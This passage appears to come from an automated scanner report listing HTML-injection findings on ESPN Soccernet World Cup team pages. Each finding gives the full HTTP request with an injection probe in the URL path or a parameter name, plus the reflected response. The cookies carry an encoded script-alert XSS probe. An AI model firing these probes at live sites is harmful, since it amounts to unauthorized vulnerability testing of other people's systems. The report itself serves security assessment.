This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil6da7b"><a>7d96bab73b8 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:02 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:02 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:14:01 GMT Content-Length: 81397 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&_slug_=brazil6da7b"><a>7d96bab73b8&topId=806003&linktext=Ex-Milan+coach+available"> ...[SNIP]...
5.63. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/205/brazil
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d87"><a>b513fd88d09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil?36d87"><a>b513fd88d09=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:12:42 GMT Content-Length: 81505 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&36d87"><a>b513fd88d09=1&_slug_=brazil&36d87"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 977b9"><a>d4b442ea0d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile977b9"><a>d4b442ea0d6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:57 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Cache-Expires: Sat, 06 Nov 2010 23:13:57 GMT Content-Length: 81910 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&_slug_=chile977b9"><a>d4b442ea0d6&topId=803725&linktext=Brilliant+Brazil+put+three+past+Chile"> ...[SNIP]...
5.65. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/207/chile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe29"><a>f1fd16cfb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile?ebe29"><a>f1fd16cfb8e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:29 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:29 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 23:12:29 GMT Content-Length: 82018 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&ebe29"><a>f1fd16cfb8e=1&_slug_=chile&ebe29"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d453d"><a>904bfdecc42 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguayd453d"><a>904bfdecc42 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:44 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:31:44 GMT Content-Length: 82073 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&_slug_=paraguayd453d"><a>904bfdecc42&topId=799269&linktext=Gerardo+Martino+to+remain+as+coach"> ...[SNIP]...
5.67. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/210/paraguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e861b"><a>1c6180afac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguay?e861b"><a>1c6180afac1=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:22:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:22:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 23:27:55 GMT Content-Length: 82181 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&e861b"><a>1c6180afac1=1&_slug_=paraguay&e861b"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416ae"><a>174e4000843 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay416ae"><a>174e4000843 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:33 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:34:33 GMT Content-Length: 81983 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&_slug_=uruguay416ae"><a>174e4000843&topId=807748&linktext=Germany+finish+in+third+place"> ...[SNIP]...
5.69. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/212/uruguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f178"><a>aa580cad459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay?2f178"><a>aa580cad459=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 23:33:48 GMT Content-Length: 82091 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
